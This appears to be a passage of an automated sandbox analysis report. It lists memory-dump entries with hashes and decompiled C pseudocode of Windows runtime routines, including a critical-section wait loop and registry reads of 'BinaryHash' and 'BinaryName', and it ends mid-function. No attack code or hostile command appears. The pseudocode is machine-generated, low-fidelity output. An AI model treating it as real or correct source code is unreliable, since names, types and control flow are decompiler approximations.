                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                        • API String ID: 0-865735534
                        • Opcode ID: 9085f0cb1f50f56b6330e607de6ffc992866c318af256384e7b0dc1897fd56ae
                        • Instruction ID: 66d908290a3d465a4f033088097eb3a5ed6a3b1729b591b8fbeac39224e79e2b
                        • Opcode Fuzzy Hash: 9085f0cb1f50f56b6330e607de6ffc992866c318af256384e7b0dc1897fd56ae
                        • Instruction Fuzzy Hash: 94A10231B00715DBDB25DFA8C458B7AB7B5EF48718F0449E9E90ADBA90DB34D809CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 63%
                        			E02AF2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                        				signed char _v8;
                        				signed int _v12;
                        				signed int _v16;
                        				signed int _v20;
                        				signed int _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				signed int _v52;
                        				void* __esi;
                        				void* __ebp;
                        				intOrPtr _t55;
                        				signed int _t57;
                        				signed int _t58;
                        				char* _t62;
                        				signed char* _t63;
                        				signed char* _t64;
                        				signed int _t67;
                        				signed int _t72;
                        				signed int _t77;
                        				signed int _t78;
                        				signed int _t88;
                        				intOrPtr _t89;
                        				signed char _t93;
                        				signed int _t97;
                        				signed int _t98;
                        				signed int _t102;
                        				signed int _t103;
                        				intOrPtr _t104;
                        				signed int _t105;
                        				signed int _t106;
                        				signed char _t109;
                        				signed int _t111;
                        				void* _t116;
                        
                        				_t102 = __edi;
                        				_t97 = __edx;
                        				_v12 = _v12 & 0x00000000;
                        				_t55 =  *[fs:0x18];
                        				_t109 = __ecx;
                        				_v8 = __edx;
                        				_t86 = 0;
                        				_v32 = _t55;
                        				_v24 = 0;
                        				_push(__edi);
                        				if(__ecx == 0x2be5350) {
                        					_t86 = 1;
                        					_v24 = 1;
                        					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                        				}
                        				_t103 = _t102 | 0xffffffff;
                        				if( *0x2be7bc8 != 0) {
                        					_push(0xc000004b);
                        					_push(_t103);
                        					E02B397C0();
                        				}
                        				if( *0x2be79c4 != 0) {
                        					_t57 = 0;
                        				} else {
                        					_t57 = 0x2be79c8;
                        				}
                        				_v16 = _t57;
                        				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                        					_t93 = _t109;
                        					L23();
                        				}
                        				_t58 =  *_t109;
                        				if(_t58 == _t103) {
                        					__eflags =  *(_t109 + 0x14) & 0x01000000;
                        					_t58 = _t103;
                        					if(__eflags == 0) {
                        						_t93 = _t109;
                        						E02B21624(_t86, __eflags);
                        						_t58 =  *_t109;
                        					}
                        				}
                        				_v20 = _v20 & 0x00000000;
                        				if(_t58 != _t103) {
                        					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                        				}
                        				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                        				_t88 = _v16;
                        				_v28 = _t104;
                        				L9:
                        				while(1) {
                        					if(E02B17D50() != 0) {
                        						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                        					} else {
                        						_t62 = 0x7ffe0382;
                        					}
                        					if( *_t62 != 0) {
                        						_t63 =  *[fs:0x30];
                        						__eflags = _t63[0x240] & 0x00000002;
                        						if((_t63[0x240] & 0x00000002) != 0) {
                        							_t93 = _t109;
                        							E02B8FE87(_t93);
                        						}
                        					}
                        					if(_t104 != 0xffffffff) {
                        						_push(_t88);
                        						_push(0);
                        						_push(_t104);
                        						_t64 = E02B39520();
                        						goto L15;
                        					} else {
                        						while(1) {
                        							_t97 =  &_v8;
                        							_t64 = E02B2E18B(_t109 + 4, _t97, 4, _t88, 0);
                        							if(_t64 == 0x102) {
                        								break;
                        							}
                        							_t93 =  *(_t109 + 4);
                        							_v8 = _t93;
                        							if((_t93 & 0x00000002) != 0) {
                        								continue;
                        							}
                        							L15:
                        							if(_t64 == 0x102) {
                        								break;
                        							}
                        							_t89 = _v24;
                        							if(_t64 < 0) {
                        								L02B4DF30(_t93, _t97, _t64);
                        								_push(_t93);
                        								_t98 = _t97 | 0xffffffff;
                        								__eflags =  *0x2be6901;
                        								_push(_t109);
                        								_v52 = _t98;
                        								if( *0x2be6901 != 0) {
                        									_push(0);
                        									_push(1);
                        									_push(0);
                        									_push(0x100003);
                        									_push( &_v12);
                        									_t72 = E02B39980();
                        									__eflags = _t72;
                        									if(_t72 < 0) {
                        										_v12 = _t98 | 0xffffffff;
                        									}
                        								}
                        								asm("lock cmpxchg [ecx], edx");
                        								_t111 = 0;
                        								__eflags = 0;
                        								if(0 != 0) {
                        									__eflags = _v12 - 0xffffffff;
                        									if(_v12 != 0xffffffff) {
                        										_push(_v12);
                        										E02B395D0();
                        									}
                        								} else {
                        									_t111 = _v12;
                        								}
                        								return _t111;
                        							} else {
                        								if(_t89 != 0) {
                        									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                        									_t77 = E02B17D50();
                        									__eflags = _t77;
                        									if(_t77 == 0) {
                        										_t64 = 0x7ffe0384;
                        									} else {
                        										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                        									}
                        									__eflags =  *_t64;
                        									if( *_t64 != 0) {
                        										_t64 =  *[fs:0x30];
                        										__eflags = _t64[0x240] & 0x00000004;
                        										if((_t64[0x240] & 0x00000004) != 0) {
                        											_t78 = E02B17D50();
                        											__eflags = _t78;
                        											if(_t78 == 0) {
                        												_t64 = 0x7ffe0385;
                        											} else {
                        												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                        											}
                        											__eflags =  *_t64 & 0x00000020;
                        											if(( *_t64 & 0x00000020) != 0) {
                        												_t64 = E02B77016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                        											}
                        										}
                        									}
                        								}
                        								return _t64;
                        							}
                        						}
                        						_t97 = _t88;
                        						_t93 = _t109;
                        						E02B8FDDA(_t97, _v12);
                        						_t105 =  *_t109;
                        						_t67 = _v12 + 1;
                        						_v12 = _t67;
                        						__eflags = _t105 - 0xffffffff;
                        						if(_t105 == 0xffffffff) {
                        							_t106 = 0;
                        							__eflags = 0;
                        						} else {
                        							_t106 =  *(_t105 + 0x14);
                        						}
                        						__eflags = _t67 - 2;
                        						if(_t67 > 2) {
                        							__eflags = _t109 - 0x2be5350;
                        							if(_t109 != 0x2be5350) {
                        								__eflags = _t106 - _v20;
                        								if(__eflags == 0) {
                        									_t93 = _t109;
                        									E02B8FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                        								}
                        							}
                        						}
                        						_push("RTL: Re-Waiting\n");
                        						_push(0);
                        						_push(0x65);
                        						_v20 = _t106;
                        						E02B85720();
                        						_t104 = _v28;
                        						_t116 = _t116 + 0xc;
                        						continue;
                        					}
                        				}
                        			}
                        0x02b4fabc
                        0x02b4fac8
                        0x02b4facb
                        0x02b4fadf
                        0x02b4fadf
                        0x02b4facb
                        0x02b4faa4
                        0x02b4fa91
                        0x02af2e6f
                        0x02af2e6f
                        0x02af2e5f
                        0x02b4fa13
                        0x02b4fa15
                        0x02b4fa17
                        0x02b4fa1f
                        0x02b4fa21
                        0x02b4fa22
                        0x02b4fa25
                        0x02b4fa28
                        0x02b4fa2f
                        0x02b4fa2f
                        0x02b4fa2a
                        0x02b4fa2a
                        0x02b4fa2a
                        0x02b4fa31
                        0x02b4fa34
                        0x02b4fa36
                        0x02b4fa3c
                        0x02b4fa3e
                        0x02b4fa41
                        0x02b4fa43
                        0x02b4fa45
                        0x02b4fa45
                        0x02b4fa41
                        0x02b4fa3c
                        0x02b4fa4a
                        0x02b4fa4f
                        0x02b4fa51
                        0x02b4fa53
                        0x02b4fa56
                        0x02b4fa5b
                        0x02b4fa5e
                        0x00000000
                        0x02b4fa5e
                        0x02af2e23

                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID: RTL: Re-Waiting
                        • API String ID: 0-316354757
                        • Opcode ID: b6efa0a8658bc6ad0b233fe24152303089dfd7836c52dcc660efd61c7bc13ac6
                        • Instruction ID: 188017b4ea22def04c60d74b41a16fb5569a3a1a756b02e78e1740f4b79afe76
                        • Opcode Fuzzy Hash: b6efa0a8658bc6ad0b233fe24152303089dfd7836c52dcc660efd61c7bc13ac6
                        • Instruction Fuzzy Hash: BA613931A00644AFDB31DFA8C8C4B7EBBB5EB44714F2406E6EA25976D0DF389941DB81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 80%
                        			E02BC0EA5(void* __ecx, void* __edx) {
                        				signed int _v20;
                        				char _v24;
                        				intOrPtr _v28;
                        				unsigned int _v32;
                        				signed int _v36;
                        				intOrPtr _v40;
                        				char _v44;
                        				intOrPtr _v64;
                        				void* __ebx;
                        				void* __edi;
                        				signed int _t58;
                        				unsigned int _t60;
                        				intOrPtr _t62;
                        				char* _t67;
                        				char* _t69;
                        				void* _t80;
                        				void* _t83;
                        				intOrPtr _t93;
                        				intOrPtr _t115;
                        				char _t117;
                        				void* _t120;
                        
                        				_t83 = __edx;
                        				_t117 = 0;
                        				_t120 = __ecx;
                        				_v44 = 0;
                        				if(E02BBFF69(__ecx,  &_v44,  &_v32) < 0) {
                        					L24:
                        					_t109 = _v44;
                        					if(_v44 != 0) {
                        						E02BC1074(_t83, _t120, _t109, _t117, _t117);
                        					}
                        					L26:
                        					return _t117;
                        				}
                        				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                        				_t5 = _t83 + 1; // 0x1
                        				_v36 = _t5 << 0xc;
                        				_v40 = _t93;
                        				_t58 =  *(_t93 + 0xc) & 0x40000000;
                        				asm("sbb ebx, ebx");
                        				_t83 = ( ~_t58 & 0x0000003c) + 4;
                        				if(_t58 != 0) {
                        					_push(0);
                        					_push(0x14);
                        					_push( &_v24);
                        					_push(3);
                        					_push(_t93);
                        					_push(0xffffffff);
                        					_t80 = E02B39730();
                        					_t115 = _v64;
                        					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                        						_push(_t93);
                        						E02BBA80D(_t115, 1, _v20, _t117);
                        						_t83 = 4;
                        					}
                        				}
                        				if(E02BBA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                        					goto L24;
                        				}
                        				_t60 = _v32;
                        				_t97 = (_t60 != 0x100000) + 1;
                        				_t83 = (_v44 -  *0x2be8b04 >> 0x14) + (_v44 -  *0x2be8b04 >> 0x14);
                        				_v28 = (_t60 != 0x100000) + 1;
                        				_t62 = _t83 + (_t60 >> 0x14) * 2;
                        				_v40 = _t62;
                        				if(_t83 >= _t62) {
                        					L10:
                        					asm("lock xadd [eax], ecx");
                        					asm("lock xadd [eax], ecx");
                        					if(E02B17D50() == 0) {
                        						_t67 = 0x7ffe0380;
                        					} else {
                        						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        					}
                        					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                        						E02BB138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                        					}
                        					if(E02B17D50() == 0) {
                        						_t69 = 0x7ffe0388;
                        					} else {
                        						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                        					}
                        					if( *_t69 != 0) {
                        						E02BAFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                        					}
                        					if(( *0x2be8724 & 0x00000008) != 0) {
                        						E02BB52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                        					}
                        					_t117 = _v44;
                        					goto L26;
                        				}
                        				while(E02BC15B5(0x2be8ae4, _t83, _t97, _t97) >= 0) {
                        					_t97 = _v28;
                        					_t83 = _t83 + 2;
                        					if(_t83 < _v40) {
                        						continue;
                        					}
                        					goto L10;
                        				}
                        				goto L24;
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID: `
                        • API String ID: 0-2679148245
                        • Opcode ID: 16013813394529ba56d14131ab8c60f9c20e1d102ac1d5d5c3856a5a898cb2ec
                        • Instruction ID: 39dc2f57ac435f6fb2dd955589cffd7812e9e0a09e8c5948c9ad9dd8c089209b
                        • Opcode Fuzzy Hash: 16013813394529ba56d14131ab8c60f9c20e1d102ac1d5d5c3856a5a898cb2ec
                        • Instruction Fuzzy Hash: 4951C1712083819FD725DF28D980B2BB7E6EFC4314F1409ACF99AA7291D771E845CB62
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 75%
                        			E02B2F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                        				intOrPtr _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v16;
                        				char* _v20;
                        				intOrPtr _v24;
                        				char _v28;
                        				intOrPtr _v32;
                        				char _v36;
                        				char _v44;
                        				char _v52;
                        				intOrPtr _v56;
                        				char _v60;
                        				intOrPtr _v72;
                        				void* _t51;
                        				void* _t58;
                        				signed short _t82;
                        				short _t84;
                        				signed int _t91;
                        				signed int _t100;
                        				signed short* _t103;
                        				void* _t108;
                        				intOrPtr* _t109;
                        
                        				_t103 = __ecx;
                        				_t82 = __edx;
                        				_t51 = E02B14120(0, __ecx, 0,  &_v52, 0, 0, 0);
                        				if(_t51 >= 0) {
                        					_push(0x21);
                        					_push(3);
                        					_v56 =  *0x7ffe02dc;
                        					_v20 =  &_v52;
                        					_push( &_v44);
                        					_v28 = 0x18;
                        					_push( &_v28);
                        					_push(0x100020);
                        					_v24 = 0;
                        					_push( &_v60);
                        					_v16 = 0x40;
                        					_v12 = 0;
                        					_v8 = 0;
                        					_t58 = E02B39830();
                        					_t87 =  *[fs:0x30];
                        					_t108 = _t58;
                        					L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                        					if(_t108 < 0) {
                        						L11:
                        						_t51 = _t108;
                        					} else {
                        						_push(4);
                        						_push(8);
                        						_push( &_v36);
                        						_push( &_v44);
                        						_push(_v60);
                        						_t108 = E02B39990();
                        						if(_t108 < 0) {
                        							L10:
                        							_push(_v60);
                        							E02B395D0();
                        							goto L11;
                        						} else {
                        							_t109 = L02B14620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                        							if(_t109 == 0) {
                        								_t108 = 0xc0000017;
                        								goto L10;
                        							} else {
                        								_t21 = _t109 + 0x18; // 0x18
                        								 *((intOrPtr*)(_t109 + 4)) = _v60;
                        								 *_t109 = 1;
                        								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                        								 *(_t109 + 0xe) = _t82;
                        								 *((intOrPtr*)(_t109 + 8)) = _v56;
                        								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                        								E02B3F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                        								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                        								 *((short*)(_t109 + 0xc)) =  *_t103;
                        								_t91 =  *_t103 & 0x0000ffff;
                        								_t100 = _t91 & 0xfffffffe;
                        								_t84 = 0x5c;
                        								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                        									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                        										_push(_v60);
                        										E02B395D0();
                        										L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                        										_t51 = 0xc0000106;
                        									} else {
                        										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                        										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                        										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                        										goto L5;
                        									}
                        								} else {
                        									L5:
                        									 *_a4 = _t109;
                        									_t51 = 0;
                        								}
                        							}
                        						}
                        					}
                        				}
                        				return _t51;
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID: @
                        • API String ID: 0-2766056989
                        • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                        • Instruction ID: 1271186073a3b464f7e79e901787095970908149948b078f15e25794980a5607
                        • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                        • Instruction Fuzzy Hash: 64516D725047109FC321DF19C840A6BBBF9FF48714F008A6DF9A597690EBB4E954CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 75%
                        			E02B73540(intOrPtr _a4) {
                        				signed int _v12;
                        				intOrPtr _v88;
                        				intOrPtr _v92;
                        				char _v96;
                        				char _v352;
                        				char _v1072;
                        				intOrPtr _v1140;
                        				intOrPtr _v1148;
                        				char _v1152;
                        				char _v1156;
                        				char _v1160;
                        				char _v1164;
                        				char _v1168;
                        				char* _v1172;
                        				short _v1174;
                        				char _v1176;
                        				char _v1180;
                        				char _v1192;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				short _t41;
                        				short _t42;
                        				intOrPtr _t80;
                        				intOrPtr _t81;
                        				signed int _t82;
                        				void* _t83;
                        
                        				_v12 =  *0x2bed360 ^ _t82;
                        				_t41 = 0x14;
                        				_v1176 = _t41;
                        				_t42 = 0x16;
                        				_v1174 = _t42;
                        				_v1164 = 0x100;
                        				_v1172 = L"BinaryHash";
                        				_t81 = E02B30BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                        				if(_t81 < 0) {
                        					L11:
                        					_t75 = _t81;
                        					E02B73706(0, _t81, _t79, _t80);
                        					L12:
                        					if(_a4 != 0xc000047f) {
                        						E02B3FA60( &_v1152, 0, 0x50);
                        						_v1152 = 0x60c201e;
                        						_v1148 = 1;
                        						_v1140 = E02B73540;
                        						E02B3FA60( &_v1072, 0, 0x2cc);
                        						_push( &_v1072);
                        						E02B4DDD0( &_v1072, _t75, _t79, _t80, _t81);
                        						E02B80C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                        						_push(_v1152);
                        						_push(0xffffffff);
                        						E02B397C0();
                        					}
                        					return E02B3B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                        				}
                        				_t79 =  &_v352;
                        				_t81 = E02B73971(0, _a4,  &_v352,  &_v1156);
                        				if(_t81 < 0) {
                        					goto L11;
                        				}
                        				_t75 = _v1156;
                        				_t79 =  &_v1160;
                        				_t81 = E02B73884(_v1156,  &_v1160,  &_v1168);
                        				if(_t81 >= 0) {
                        					_t80 = _v1160;
                        					E02B3FA60( &_v96, 0, 0x50);
                        					_t83 = _t83 + 0xc;
                        					_push( &_v1180);
                        					_push(0x50);
                        					_push( &_v96);
                        					_push(2);
                        					_push( &_v1176);
                        					_push(_v1156);
                        					_t81 = E02B39650();
                        					if(_t81 >= 0) {
                        						if(_v92 != 3 || _v88 == 0) {
                        							_t81 = 0xc000090b;
                        						}
                        						if(_t81 >= 0) {
                        							_t75 = _a4;
                        							_t79 =  &_v352;
                        							E02B73787(_a4,  &_v352, _t80);
                        						}
                        					}
                        					L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                        				}
                        				_push(_v1156);
                        				E02B395D0();
                        				if(_t81 >= 0) {
                        					goto L12;
                        				} else {
                        					goto L11;
                        				}
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID: InitializeThunk
                        • String ID: BinaryHash
                        • API String ID: 2994545307-2202222882
                        • Opcode ID: 8fdaf2665f562b40cfa78b4fac2e1f37f24646d985dc8fc4330f4c4da85e56b7
                        • Instruction ID: 2d6ed863cab27cff6af3ba32025e9a1f17d303123b876107b91ea4ecfb25c3b8
                        • Opcode Fuzzy Hash: 8fdaf2665f562b40cfa78b4fac2e1f37f24646d985dc8fc4330f4c4da85e56b7
                        • Instruction Fuzzy Hash: 944154B2D0052DABDF21DA50DC80FEEB77DAB44718F0045E5EA19AB250DB709E88DF94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 71%
                        			E02BC05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                        				signed int _v20;
                        				char _v24;
                        				signed int _v28;
                        				char _v32;
                        				signed int _v36;
                        				intOrPtr _v40;
                        				void* __ebx;
                        				void* _t35;
                        				signed int _t42;
                        				char* _t48;
                        				signed int _t59;
                        				signed char _t61;
                        				signed int* _t79;
                        				void* _t88;
                        
                        				_v28 = __edx;
                        				_t79 = __ecx;
                        				if(E02BC07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                        					L13:
                        					_t35 = 0;
                        					L14:
                        					return _t35;
                        				}
                        				_t61 = __ecx[1];
                        				_t59 = __ecx[0xf];
                        				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                        				_v36 = _a8 << 0xc;
                        				_t42 =  *(_t59 + 0xc) & 0x40000000;
                        				asm("sbb esi, esi");
                        				_t88 = ( ~_t42 & 0x0000003c) + 4;
                        				if(_t42 != 0) {
                        					_push(0);
                        					_push(0x14);
                        					_push( &_v24);
                        					_push(3);
                        					_push(_t59);
                        					_push(0xffffffff);
                        					if(E02B39730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                        						_push(_t61);
                        						E02BBA80D(_t59, 1, _v20, 0);
                        						_t88 = 4;
                        					}
                        				}
                        				_t35 = E02BBA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                        				if(_t35 < 0) {
                        					goto L14;
                        				}
                        				E02BC1293(_t79, _v40, E02BC07DF(_t79, _v28,  &_a4,  &_a8, 1));
                        				if(E02B17D50() == 0) {
                        					_t48 = 0x7ffe0380;
                        				} else {
                        					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        				}
                        				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                        					E02BB138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                        				}
                        				goto L13;
                        			}


















                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID: `
                        • API String ID: 0-2679148245
                        • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                        • Instruction ID: 36fb5ab7183513374f73a1c63adbf3427bda456cf96f9144c91fe424a0a341b8
                        • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                        • Instruction Fuzzy Hash: C531F332600355ABE720EF64CC85F9777DAEB84758F1446B9FA589B280DB70E904CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 72%
                        			E02B73884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                        				char _v8;
                        				intOrPtr _v12;
                        				intOrPtr* _v16;
                        				char* _v20;
                        				short _v22;
                        				char _v24;
                        				intOrPtr _t38;
                        				short _t40;
                        				short _t41;
                        				void* _t44;
                        				intOrPtr _t47;
                        				void* _t48;
                        
                        				_v16 = __edx;
                        				_t40 = 0x14;
                        				_v24 = _t40;
                        				_t41 = 0x16;
                        				_v22 = _t41;
                        				_t38 = 0;
                        				_v12 = __ecx;
                        				_push( &_v8);
                        				_push(0);
                        				_push(0);
                        				_push(2);
                        				_t43 =  &_v24;
                        				_v20 = L"BinaryName";
                        				_push( &_v24);
                        				_push(__ecx);
                        				_t47 = 0;
                        				_t48 = E02B39650();
                        				if(_t48 >= 0) {
                        					_t48 = 0xc000090b;
                        				}
                        				if(_t48 != 0xc0000023) {
                        					_t44 = 0;
                        					L13:
                        					if(_t48 < 0) {
                        						L16:
                        						if(_t47 != 0) {
                        							L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                        						}
                        						L18:
                        						return _t48;
                        					}
                        					 *_v16 = _t38;
                        					 *_a4 = _t47;
                        					goto L18;
                        				}
                        				_t47 = L02B14620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                        				if(_t47 != 0) {
                        					_push( &_v8);
                        					_push(_v8);
                        					_push(_t47);
                        					_push(2);
                        					_push( &_v24);
                        					_push(_v12);
                        					_t48 = E02B39650();
                        					if(_t48 < 0) {
                        						_t44 = 0;
                        						goto L16;
                        					}
                        					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                        						_t48 = 0xc000090b;
                        					}
                        					_t44 = 0;
                        					if(_t48 < 0) {
                        						goto L16;
                        					} else {
                        						_t17 = _t47 + 0xc; // 0xc
                        						_t38 = _t17;
                        						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                        							_t48 = 0xc000090b;
                        						}
                        						goto L13;
                        					}
                        				}
                        				_t48 = _t48 + 0xfffffff4;
                        				goto L18;
                        			}
















                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID: InitializeThunk
                        • String ID: BinaryName
                        • API String ID: 2994545307-215506332
                        • Opcode ID: a2bab567d0b562ac61abbf9250d228a7aff01cb643f9ec4e1383f38db587486e
                        • Instruction ID: 10f4d75684346247b9a342043d2ce78e23552cd103b9863891c87279f821f115
                        • Opcode Fuzzy Hash: a2bab567d0b562ac61abbf9250d228a7aff01cb643f9ec4e1383f38db587486e
                        • Instruction Fuzzy Hash: D3310572901509AFDB15DA58C945E6BB7B5EB80720F0141E9EE26A7280DB309E00DBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 33%
                        			E02B2D294(void* __ecx, char __edx, void* __eflags) {
                        				signed int _v8;
                        				char _v52;
                        				signed int _v56;
                        				signed int _v60;
                        				intOrPtr _v64;
                        				char* _v68;
                        				intOrPtr _v72;
                        				char _v76;
                        				signed int _v84;
                        				intOrPtr _v88;
                        				char _v92;
                        				intOrPtr _v96;
                        				intOrPtr _v100;
                        				char _v104;
                        				char _v105;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed int _t35;
                        				char _t38;
                        				signed int _t40;
                        				signed int _t44;
                        				signed int _t52;
                        				void* _t53;
                        				void* _t55;
                        				void* _t61;
                        				intOrPtr _t62;
                        				void* _t64;
                        				signed int _t65;
                        				signed int _t66;
                        
                        				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                        				_v8 =  *0x2bed360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                        				_v105 = __edx;
                        				_push( &_v92);
                        				_t52 = 0;
                        				_push(0);
                        				_push(0);
                        				_push( &_v104);
                        				_push(0);
                        				_t59 = __ecx;
                        				_t55 = 2;
                        				if(E02B14120(_t55, __ecx) < 0) {
                        					_t35 = 0;
                        					L8:
                        					_pop(_t61);
                        					_pop(_t64);
                        					_pop(_t53);
                        					return E02B3B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                        				}
                        				_v96 = _v100;
                        				_t38 = _v92;
                        				if(_t38 != 0) {
                        					_v104 = _t38;
                        					_v100 = _v88;
                        					_t40 = _v84;
                        				} else {
                        					_t40 = 0;
                        				}
                        				_v72 = _t40;
                        				_v68 =  &_v104;
                        				_push( &_v52);
                        				_v76 = 0x18;
                        				_push( &_v76);
                        				_v64 = 0x40;
                        				_v60 = _t52;
                        				_v56 = _t52;
                        				_t44 = E02B398D0();
